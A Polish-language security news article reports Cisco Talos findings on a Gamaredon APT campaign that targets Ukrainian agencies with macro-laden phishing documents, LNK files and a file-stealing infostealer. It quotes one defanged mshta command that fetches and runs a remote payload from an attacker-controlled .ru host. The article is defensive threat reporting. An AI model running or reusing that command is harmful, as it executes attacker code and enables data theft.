Cisco: Cyberprzestępcy z grupy Gamaredon APT celują w ukraińskie agencje rządowe

avlab.pl 2 lat temu
Zdjęcie: Cisco: Cyberprzestępcy z grupy Gamaredon APT celują w ukraińskie agencje rządowe


Analitycy Cisco Talos natrafili na nową kampanię przypisywaną powiązanej z Rosją grupie Gamaredon APT, która infekuje ukraińskich użytkowników złośliwym oprogramowaniem wykradającym informacje. Grupa ta niewątpliwie pochodzi z Rosji, gdyż już lat jest ona znana z atakowania polskich placówek dyplomatycznych oraz innych polskich instytucji funkcjonujących na terenie Ukrainy. Ich ataki zwykle były poprzedzone rozpoznaniem, a końcowe złośliwe oprogramowanie przesyłano jedynie na wybrane hosty. Na podstawie analiz przeprowadzonych ataków zaobserwowano wykorzystanie wyspecjalizowanego złośliwego oprogramowania.

Cyberprzestępcy wykorzystują dokumenty phishingowe, zawierające przynęty związane z rosyjską inwazją na Ukrainę. Używane są złośliwe skrypty umożliwiają dostęp do systemów, natomiast złośliwe pliki binarne są wdrażane w fazie poinfekcyjnej. Eksperci Cisco zidentyfikowali malware, które może wykradać interesujące pliki ofiary i rozmieszczać dodatkowe payloady zgodnie z instrukcjami napastników.

Kampania obserwowana jest od sierpnia 2022 roku i ma na celu dostarczenie złośliwego systemu wykradającego informacje do zlokalizowanych na terenie Ukrainy maszyn-ofiar.

Socjotechnika jest głównym sposobem przekonania ofiarę do otworzenia złośliwego makra w dokumentach Microsoft Office. Makra te pobierają i otwierają archiwa RAR zawierające pliki LNK, które następnie pobierają i aktywują następny etap payloadu na zainfekowanym urządzeniu.

mshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /f

Eksperci Cisco Talos zaobserwowali znaczne podobieństwo między malware oraz infrastrukturą wykorzystaną w tej kampanii a tymi, które zostały wykorzystane w serii ataków, które ukraiński Zespół Reagowania na Incydenty Komputerowe (CERT-UA) przypisał niedawno grupie Gamaredon.

Jeden z plików wykonywalnych wdrożonych przez napastników za pośrednictwem skryptu PowerShell składał się z infostealera, który eksfiltruje z zainfekowanego urządzenia pliki o określonych rozszerzeniach:

.doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z i .mdb.

Jest to nowy infostealer, którego Gamaredon nie używał wcześniej w innych kampaniach. Eksperci podejrzewają, iż może to być element stworzonych przez grupę cyberprzestępców rodziny luk w zabezpieczeniach pod nazwą „Giddome”.

Po uruchomieniu zainfekowanego endpointa, złośliwe oprogramowanie skanuje wszystkie podłączone do pamięci masowej urządzenia w poszukiwaniu plików z wyżej wymienionymi rozszerzeniami. dla wszystkich z nich malware wykonuje żądanie POST z metadanymi o wykradaniu pliku i jego zawartości do serwerów przestępców.

Idź do oryginalnego materiału